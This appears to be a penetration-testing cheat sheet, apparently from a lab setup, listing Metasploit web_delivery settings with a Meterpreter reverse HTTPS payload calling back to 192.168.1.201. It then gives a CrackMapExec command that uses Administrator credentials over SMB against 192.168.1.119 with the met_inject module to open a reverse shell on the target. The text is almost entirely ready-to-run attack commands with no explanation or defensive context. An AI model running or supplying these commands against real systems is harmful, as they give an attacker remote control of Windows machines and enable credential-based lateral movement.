exploit/multi/script/web_delivery
set SRVHOST 192.168.1.201
set SRVPORT 8443
set exitonsession false
set SSL true
set payload windows/meterpreter/reverse_https
set LHOST 192.168.1.201
set LPORT 443
set LURI rfs
CrackMapExec MSF reverse Shell - met_inject
crackmapexec smb 192.168.1.119 -u 'Administrator' -p 'Password!' -d dc.deathstar.rfs -M met_inject -o SRVHOST=192.168.1.201 SRVPORT=9443 RAND=J3PR0Jn6smfPvr SSL=https